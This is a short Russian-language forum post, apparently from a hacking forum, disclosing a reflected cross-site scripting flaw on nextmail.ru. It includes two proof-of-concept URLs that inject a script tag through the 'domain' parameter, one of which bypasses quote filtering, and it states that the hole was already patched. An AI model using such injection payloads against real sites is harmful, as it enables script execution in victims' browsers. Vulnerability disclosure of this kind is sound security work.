• XSS.stack #1 – первый литературный журнал от юзеров форума

www.nextmail.ru

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Cross Site Scripting на NextMail.ru
logo.gif

Уязвимость позволяет удаленному пользователю выполнить произвольный JS код на компьютере жертвы. ПРимер:
Код:
http://www.nextmail.ru/?m=accountmissing&domain=[script]alert('xss.pro/')[/script]

А вот еще с фильтрацией кавычек:
Код:
http://www.nextmail.ru/?m=accountmissing&domain=[script]alert(/xss.pro/)[/script]

На момент написания статьи уязвимость была УЖЕ пропатчена. Инфа вывалена для ознакомления.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх